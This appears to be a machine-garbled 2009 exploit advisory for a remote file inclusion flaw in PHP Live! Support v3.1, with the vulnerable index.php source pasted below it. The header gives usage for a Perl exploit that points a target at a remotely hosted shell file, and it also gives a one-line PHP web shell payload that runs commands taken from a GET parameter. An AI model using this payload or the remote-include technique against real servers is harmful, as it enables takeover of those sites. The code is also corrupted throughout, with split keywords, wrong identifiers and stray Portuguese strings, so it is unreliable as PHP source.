Code:
#####
# [»] Author: Don Tukulesto (root@indonesiancoder.com)
# [»] Date: November 23,200 9
# [»] Homepage: http://www.indonesiancoder.com
# [»] Method: Remote File Transfer sion
# [»] Location: INDONESIA
# [»] Vendor: http://www.phplivesupport.com/
# [»] Describe: PHP Live! Support v3.1 (c) by OSI Codes Inc.
# Chat with your website visitors with PHP Live!
#
# * Provide Live Support on your Website
# * Increase your Sales
# * Increase Customer Satisfaction
# * Decrease your phone/operational costs
# [»] Usage:
# Perl tux. pl <target> <weapon url> cmd
# Perl tux. plhttp: // 127.0.0.1/path/
Http://www.indonesiancoder.org/shell.txt cmd
# Weapon example: <? Php system ($ _ GET [cmd]);?>
#####
<! -- More -->
# [-] Bugs in
[+] Index. php
<Pre lang = "php">
<? Php
/*************************************** ****************
* Copyright osi codes-PHP Live!
**************************************** ***************/
Session_start ();
$ L = "";
// Try to get cookie value first
If (isset ($ _ COOKIE [COOKIE_PHPLIVE_SITE]) {$ l =
$ _ COOKIE [COOKIE_PHPLIVE_SITE];}
If (isset ($ _ GET [l]) {$ l = $ _ GET [l];}
If (isset ($ _ POST [l]) {$ l = $ _ POST [l];}
If (! File_exists ("./web/conf-init.php "))
{
HEADER ("location: setup/index. php ");
Exit;
}
Include_once ("./API/Util_Dir.php ");
If (Util_DIR_CheckDir (".", $ l ))
Include_once ("./web/$ l/$ l-conf-init.php ");
Include_once ("./web/conf-init.php ");
$ DOCUMENT_ROOT = realpath (preg_replace ("/http:/", "", $ DOCUMENT_ROOT
));
Include_once ("$ DOCUMENT_ROOT/API/Util_Error.php ");
Include_once ("$ DOCUMENT_ROOT/system. php ");
Include_once ("$ DOCUMENT_ROOT/lang_packs/$ LANG_PACK.php ");
Include_once ("$ DOCUMENT_ROOT/web/VERSION_KEEP.php ");
Include_once ("$ DOCUMENT_ROOT/API/Util_CleanFiles.php ");
Include_once ("$ DOCUMENT_ROOT/API/SQL. php ");
Include_once ("$ DOCUMENT_ROOT/API/Users/get. php ");
Include_once ("$ DOCUMENT_ROOT/API/Users/update. php ");
Include_once ("$ DOCUMENT_ROOT/API/Chat/remove. php ");
Include_once ("$ DOCUMENT_ROOT/API/ASP/get. php ");
// Initialize
$ Action = $ error = $ sid = $ site = $ remember = "";
$ Sound_file = "cellular.wav ";
$ Isadmin = $ winapp = $ autologin = $ wflag = $ closewin = 0;
If (! Isset ($ _ SESSION [session_admin])
{
Session_register ("session_admin ");
$ Session_admin = ARRAY ();
$ _ SESSION [session_admin] = ARRAY ();
}
// Check to see if the site login is passes. if not, then lets see
How many
// Sites are in the asp model. if only ONE, then default to that one.
$ Total_sites = AdminASP_get_TotalUsers ($ dbh );
If ($ total_sites = 1)
{
$ Site = AdminASP_get_AllUsers ($ dbh, 0, 1 );
$ L = $ site [0] [login];
}
If (isset ($ LOGO) & file_exists ("$ DOCUMENT_ROOT/web/$ l/$ LOGO ")&&
$ LOGO)
$ Logo = "$ BASE_URL/web/$ l/$ LOGO ";
Else if (file_exists ("$ DOCUMENT_ROOT/web/$ LOGO_ASP") & $ LOGO_ASP)
$ Logo = "$ BASE_URL/web/$ LOGO_ASP ";
Else
$ Logo = "$ BASE_URL/images/logo.gif ";
// Get variables
If (isset ($ _ POST [action]) {$ action =$ _ POST [action];}
If (isset ($ _ GET [action]) {$ action =$ _ GET [action];}
If (isset ($ _ POST [winapp]) {$ winapp =$ _ POST [winapp];}
If (isset ($ _ GET [winapp]) {$ winapp =$ _ GET [winapp];}
If (isset ($ _ GET [wflag]) {$ wflag =$ _ GET [wflag];}
If (isset ($ _ GET [closewin]) & ($ _ GET [closewin]! = "Undefined ")
) {$ Closewin =$ _ GET [closewin];}
// Conditions
If (isset ($ _ COOKIE [COOKIE_PHPLIVE_LOGIN]) & isset (
$ _ COOKIE [COOKIE_PHPLIVE_PASSWORD]) & isset (
$ _ COOKIE [COOKIE_PHPLIVE_SITE]) &! $ Action)
$ Autologin = 1;
If ($ action = "login ")
{
If ($ l)
$ Site = $ l;
Else
$ Site = $ _ POST [site];
$ Aspinfo = AdminASP_get_ASPInfoByASPLogin ($ dbh, $ site );
$ Admin = AdminUsers_get_UserInfoByLoginPass ($ dbh, $ _ POST [login],
$ _ POST [password], $ aspinfo [aspID]);
If (! $ Aspinfo [active_status])
$ Error = "Servi? O est? Inativo. Entre em contato com o
Administrador para obter detalhes setup .";
Else
{
If ($ admin [userID] & ($ admin [aspID] ==$ aspinfo [aspID]
))
{
CleanFiles_util_CleanChatSessionFiles ();
// Set $ sid. $ sid is used to keep track of this admin
User. $ sid allows
// So a user can log into several admin departments on same
Computer. it is
// Passed everywhere the admin goes.
$ Sid = time ();
$ Administrative ments = adminusers_get_useradministrative ments ($ dbh,
$ Admin [userID]);
$ Dept_string = "";
For ($ c = 0; $ c <count ($ minutes); ++ $ c)
{
$ The_department = $ departments [$ c];
$ Dept_string. = "deptID = $ the_department [deptID] OR"
;
}
$ Dept_string. = "deptID = 0 ";
$ _ SESSION [session_admin] [$ sid] = ARRAY ();
$ _ SESSION [session_admin] [$ sid] [dept_string] =
$ Dept_string;
$ _ SESSION [session_admin] [$ sid] [admin_id] =
$ Admin [userID];
$ _ SESSION [session_admin] [$ sid] [requests] = 0;
$ _ SESSION [session_admin] [$ sid] [aspID] =
$ Aspinfo [aspID];
$ _ SESSION [session_admin] [$ sid] [asp_login] =
$ Aspinfo [login];
$ _ SESSION [session_admin] [$ sid] [active_footprints] = 0
;
$ _ SESSION [session_admin] [$ sid] [winapp] = "$ winapp ";
$ _ SESSION [session_admin] [$ sid] [close_timer] = 0;
$ _ SESSION [session_admin] [$ sid] [traffic_monitor] = 0;
$ _ SESSION [session_admin] [$ sid] [available_status] = 1;
$ _ SESSION [session_admin] [$ sid] [sound] = "on ";
$ _ SESSION [session_admin] [$ sid] [request_ids] = "";
$ _ SESSION [session_admin] [$ sid] [traffic_timer] =
$ Admin [lele_refresh];
$ Isadmin = 1;
// Check to see if they want to be remembered... if so,
Just set cookie.
// Lets set it for 1 month for now.
$ Cookie_lifespan = time () + 60*60*24*30;
If (isset ($ _ POST [remember])
{
Setcookie ("COOKIE_PHPLIVE_LOGIN", $ _ POST [login],
$ Cookie_lifespan );
Setcookie ("COOKIE_PHPLIVE_PASSWORD ",
$ _ POST [password], $ cookie_lifespan );
Setcookie ("COOKIE_PHPLIVE_SITE", $ aspinfo [login],
$ Cookie_lifespan );
}
}
Else
{
// Reset cookie if cookies are set
If (isset ($ _ COOKIE [COOKIE_PHPLIVE_LOGIN]) & isset (
$ _ COOKIE [COOKIE_PHPLIVE_PASSWORD])
{
Setcookie ("COOKIE_PHPLIVE_LOGIN", "",-1 );
Setcookie ("COOKIE_PHPLIVE_PASSWORD", "",-1 );
Setcookie ("COOKIE_PHPLIVE_SITE", "",-1 );
}
$ Error = "Falha de Login. Nota: sua senha? (CaSE
SenSiTiVE ).";
}
}
}
Else if ($ action = "logout ")
{
If (isset ($ _ COOKIE [COOKIE_PHPLIVE_LOGIN]) & isset (
$ _ COOKIE [COOKIE_PHPLIVE_PASSWORD]) &! $ Wflag)
{
Setcookie ("COOKIE_PHPLIVE_LOGIN", "",-1 );
Setcookie ("COOKIE_PHPLIVE_PASSWORD", "",-1 );
Setcookie ("COOKIE_PHPLIVE_SITE", "",-1 );
}
$ Sid = $ _ GET [sid];
$ L = $ _ SESSION [session_admin] [$ sid] [asp_login];
AdminUsers_update_Status ($ dbh,
$ _ SESSION [session_admin] [$ sid] [admin_id], 0 );
AdminUsers_update_UserValue ($ dbh,
$ _ SESSION [session_admin] [$ sid] [admin_id], "last_active _